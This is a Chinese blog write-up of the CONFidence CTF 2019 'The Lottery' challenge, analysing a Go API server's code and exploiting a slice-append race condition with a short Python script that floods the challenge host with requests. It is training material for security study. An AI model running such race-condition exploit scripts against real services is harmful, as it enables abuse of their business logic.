

Automne's Shadow.

CONFidence CTF 2019 The Lottery WriteUp

Automne's Shadow.

CONFidence CTF 2019 The Lottery WriteUp

golang race condition

 2019/03/27   Share

• 
• 
• 
• 
• 

Web

最近在学GoLang。

本题参考链接：https://balsn.tw/ctf_writeup/20190317-confidencectf/#the-lottery

使用Go语言编写的API服务器，下载压缩包后首先看main.go，主要是搭建一个HTTP Server。比较重要的是下面两行，分别定义了一个service和初始化了路由。

service := app.NewService(ctx, lotteryPeriod, deleteAccountAfter)
router := transport.InitRouter(service, flag)

service的返回值如代码所示：

func NewService(ctx context.Context, lotteryPeriod, deleteAccountAfter time.Duration) *Service {
	return &Service{
		accounts:           make(map[string]Account),
		lottery:            NewLottery(ctx, lotteryPeriod),
		deleteAccountAfter: deleteAccountAfter,
	}
}

然后InitRouter里提供了下面的Rest API接口：

r.Get("/", handler.IndexGet)
r.Post("/account", handler.AccountAdd)
r.Post("/account/{name}/amount", handler.AccountAddAmount)
r.Get("/account/{name}", handler.AccountGet)
r.Post("/lottery/add", handler.LotteryAdd)
r.Get("/lottery/results", handler.LotteryResults)

其中的handler.AccountGet方法，当flag变量为true时，将会在请求对应账号的响应里返回flag。

接着跟到h.service.AccountGet方法里

func (s *Service) AccountGet(name string) (Account, bool, error) {
	s.mutex.RLock()
	defer s.mutex.RUnlock()
	account, found := s.accounts[name]
	if !found {
		return Account{}, false, ErrNotFound
	}
	superUser := s.lottery.IsWinner(name) || account.IsMillionaire()
	return account, superUser, nil
}

可以看到，s.lottery.IsWinner(name) || account.IsMillionaire()为true，就可以成为superUser拿到flag。

先看s.lottery.IsWinner(name)，代码如下：

func (l *Lottery) IsWinner(name string) bool {
	l.mutex.RLock()
	defer l.mutex.RUnlock()
	if _, won := l.winners[name]; won {
		return true
	}
	return false
}

最后跟到下面的函数里，也就是当账号里的amounts达到0x133700时，将会成为winner，但是由于是随机数，所以需要爆破。

func (l *Lottery) evaluate() {
	l.mutex.Lock()
	defer l.mutex.Unlock()
	accounts := l.accounts
	l.winners = make(map[string]struct{})
	l.accounts = make(map[string]Account)
	for name, account := range accounts {
		amounts := append(account.Amounts, randInt(999913, 3700000))
		sum := 0
		for _, a := range amounts {
			sum += a
		}
		if sum == 0x133700 {
			l.winners[name] = struct{}{}
		}
	}
}

接着看account.IsMillionaire()这个条件。

func (a *Account) IsMillionaire() bool {
	sum := 0
	for _, a := range a.Amounts {
		sum += a
	}
	return sum >= 1000000
}

只要账号的Amounts达到1000000即可，但是AddAmount函数对添加的次数和金额都做了限制，其中MaxAmount为99，MaxAmountsLen为4。

func (a *Account) AddAmount(amount int) error {
	if amount < 0 || amount > MaxAmount {
		return errors.Wrapf(ErrInvalidData, "amount must be positive and less than %d: got '%d'", MaxAmount+1, amount)
	}
	if len(a.Amounts) >= MaxAmountsLen {
		return errors.Wrapf(ErrInvalidData, "reached maximum number of amounts (%d)", MaxAmountsLen)
	}
	a.Amounts = append(a.Amounts, amount)
	return nil
}

对接口进行测试

当传入4次amount后再添加amount将会报错

要想成为百万富翁，留意到Lottery里的evaluate函数，其中的append()方法有机会将100万添加到账号里。

amounts := append(account.Amounts, randInt(999913, 3700000))

看一下amounts的类型，是一个数组切片。

type Account struct {
	Name    string `json:"name"`
	Amounts []int  `json:"amounts"`
}

对于Go里面的数组切片，如果其capacity存在冗余，那么并发写数据的时候，就会存在条件竞争的问题。
思路就是先通过handler.AccountAddAmount方法添加三次金额，然后调用handler.LotteryAdd方法和其条件竞争，写入成功即可得到flag。

脚本如下：

#!/usr/bin/env python3
import requests

s = requests.session()

url = 'https://lottery.zajebistyc.tf'

names = []
for _ in range(999999):
    r = s.post(url + "/account").json()
    name = r['name']
    names.append(name)
    for _ in range(3):
        r = s.post(url + f'/account/{name}/amount', json=dict(amount=99))
		
    r = s.get(url + f'/account/{name}')

    r = s.post(url + f'/lottery/add', json=dict(accountName=name))

    r = s.post(url + f'/account/{name}/amount', json=dict(amount=87))

    r = s.get(url + f'/account/{name}')
    print(r.text)
    with open('log','a') as f:
        print(r.text, file=f)

得到flag:

原文作者: Automne

原文链接: https://ce-automne.github.io/2019/03/27/CONFidence -CTF-2019-The Lottery -WriteUp/

发表日期: March 27th 2019, 10:54:00 pm

版权声明: 本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

• Next Post
  0CTF 2019 babyrsa WriteUp
• Previous Post
  MySQL Blind Injection Scripts

Powered by Hexotheme Archer

本站总访问量PV: 次 :)

CATALOG



• Archive
• Tag
• Cate

Total : 62

2021

• 01/23拿到CAS单点登录的ticket真的就可以为所欲为了吗

2020

• 08/23Shiro 1.2.4反序列化漏洞分析和利用
• 07/19TSG CTF 2020 Beginner's Crypto WriteUp
• 07/18Tomcat Session反序列化漏洞CVE-2020-9484分析
• 06/11Paillier Cryptosystem对应的问题解析
• 02/16RSA LSB Oracle攻击原理分析
• 02/11Log4j反序列化漏洞分析
• 02/08Java SPI机制与SnakeYaml反序列化漏洞
• 02/04WebGoat8.0 SQL Injection问题分析
• 01/28WebGoat8.0 Insecure Deserialization问题分析
• 01/26LCG和模p平方根结合的题目
• 01/18IDEA Community 创建Java Servlet项目

2019

• 12/26FastJson 1.2.47 Deserialization Debug
• 12/22watevr CTF 2019 Crypto WriteUp
• 12/22UTC CTF 2019 Crypto WriteUp
• 12/10FastJson 1.2.24 Deserialization Debug
• 12/07RMI && Fastjson 1.2.47 RCE Review
• 11/23Weblogic CVE-2019-2647 XXE Vulnerability Review
• 11/16Apache Commons Collections Deserialization Review
• 11/09RedPwnCTF 2019 blueprint WriteUp
• 07/25HWCTF Mobile WriteUp
• 07/20CBC MAC Forgery Conclusion
• 07/14XMAN CTF Crypto WriteUp
• 07/14CBC Bit-Flipping Attack Conclusion Part2
• 07/05ISITDTU CTF 2019 WriteUp Part2
• 07/02ISITDTU CTF 2019 WriteUp
• 07/01RCTF 2019 BabyCrypto WriteUp
• 06/26Hash Length Extension Attack Conclusion
• 06/23CBC Padding Oracle Attack Conclusion
• 06/15HSCTF 2019 UnSolved WriteUp
• 06/06HSCTF 2019 SuperSecureSystem WriteUp
• 05/23CBC Bit-Flipping Attack Conclusion
• 05/19LFSR in Crypto Conclusion
• 05/18CSAW CTF 2017 BabyCrypt WriteUp
• 05/18CTF 313 2019 Angle of Approach WriteUp
• 05/05UUTCTF 2019 Solve the Crypto WriteUp
• 04/27SECCONCTF 2017 Very Smooth WriteUp
• 04/27Plaid CTF 2019 Project Eulernt WriteUp
• 04/25TG:HACK CTF 2019 UnSolved WriteUp
• 04/23ASIS CTF 2019 A delicious soup WriteUp
• 04/21TG:HACK CTF 2019 Solved WriteUp
• 04/19RadarCTF 2019 Crypto WriteUp
• 04/18HackZone CTF 2019 MeSS WriteUp
• 04/110CTF 2019 zer0lfsr WriteUp
• 04/110CTF 2019 babyrsa WriteUp
• 03/27CONFidence CTF 2019 The Lottery WriteUp
• 03/21MySQL Blind Injection Scripts
• 03/14TAMU CTF 2019 LocalNews WriteUp
• 03/12BSidesSF CTF 2019 GoodLuks WriteUp
• 03/10BSidesSF CTF 2019 WeatherCompanion WriteUp
• 03/07BSidesSF CTF 2019 Sequel WriteUp
• 03/05BSidesSF CTF 2017 FlagStore WriteUp
• 03/03BSidesSF CTF 2017 Pinlock WriteUp
• 02/24BSidesSF CTF 2018 PasswordVault WriteUp

2018

• 12/23XMAS CTF 2018 ChristmasGame WriteUp
• 12/14OtterCTF 2018 Forensics WriteUp Part 2
• 12/13OtterCTF 2018 Forensics WriteUp Part 1
• 09/24CSAW CTF 2018 No Vulnerable Services WriteUp
• 09/19CSAW CTF 2018 SSO WriteUp
• 08/23WhiteHat Grand Prix 2018 Misc02 WriteUp
• 08/05CTFZone 2018 Never ever be fooled to pay the ransomware! WriteUp

2017

• 01/24SQL Injections with SQLi Labs WriteUp I

lfsr z3 python reverse fat git broadcastreceiver sha-1 cbc sqli sqlite golang race condition luks hashcat photorec MAC sso oauth 2.0 padding oracle csp xss abe vdex ransomware frida ndk pwntools hashpumpy sourceleakhacker ecb socat fastjson JdbcRowsetImpl idea servlet volatility inet_aton boneh durfee lcg rabin egcd cipolla's algorithm spi snakeyaml ScriptEngineManager malware codereflect mysql yara plugin deserialization log4j rsa binary javascript prototype pollution nodejs shiro ysoserial primefac rsatool ssl AES tshark gmpy2 RsaCtfTool Hex flask ssti ecc Modular operation WebGoat8 order by tomcat nim game .iso gpg outguess sage google cloud sdk zsteg base58 fermat multi-primes prng rmi jndi Paillier Cryptosystem rsa lsb oracle SQL Injection ping delay xor CAS 单点登录 渗透测试 weblogic xxe reflect 010 editor gcd



缺失模块。
1、请确保node版本大于6.2
2、在博客根目录（注意不是archer根目录）执行以下命令：
npm i hexo-generator-json-content --save
3、在根目录_config.yml里添加配置：

jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true

Crypto Android Web Forensics Misc

